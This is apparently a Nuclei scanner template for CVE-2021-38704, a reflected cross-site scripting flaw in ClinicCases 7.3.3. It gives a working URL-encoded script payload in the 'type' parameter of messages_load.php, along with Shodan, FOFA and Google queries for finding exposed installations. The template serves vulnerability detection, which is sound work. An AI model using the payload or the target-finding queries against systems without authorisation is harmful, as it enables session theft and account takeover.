id: CVE-2021-38704 info: name: ClinicCases 7.3.3 Cross-Site Scripting author: alph4byt3 severity: medium description: ClinicCases 7.3.3 is susceptible to multiple reflected cross-site scripting vulnerabilities that could allow unauthenticated attackers to introduce arbitrary JavaScript by crafting a malicious URL. This can result in account takeover via session token theft. impact: | Successful exploitation of this vulnerability could allow an attacker to execute malicious scripts in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected website. remediation: | To mitigate this vulnerability, it is recommended to implement proper input validation and sanitization techniques to prevent the execution of malicious scripts. reference: - https://github.com/sudonoodle/CVE-2021-38704 - https://nvd.nist.gov/vuln/detail/CVE-2021-38704 - https://github.com/judsonmitchell/ClinicCases/releases - https://github.com/ARPSyndicate/cvemon - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-38704 cwe-id: CWE-79 epss-score: 0.0015 epss-percentile: 0.5117 cpe: cpe:2.3:a:cliniccases:cliniccases:7.3.3:*:*:*:*:*:*:* metadata: max-request: 1 vendor: cliniccases product: cliniccases shodan-query: - http.title:"ClinicCases",html:"/cliniccases/" - http.title:"cliniccases",html:"/cliniccases/" fofa-query: title="cliniccases",html:"/cliniccases/" google-query: intitle:"cliniccases",html:"/cliniccases/" tags: cve,cve2021,xss,cliniccases http: - method: GET path: - '{{BaseURL}}/cliniccases/lib/php/data/messages_load.php?type=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' matchers-condition: and matchers: - type: word part: body words: - "" - type: word part: header words: - text/html - type: status status: - 200 # digest: 490a0046304402200132d28b9ece1813c2cbff293d1769670075b3a8fc3e668bed95a068ed7993c80220557dec056c887098af52c27ba581fc7e7d6f4151e9b37b2edadbd1a693f0c329:922c64590222798bb761d5b6d8e72950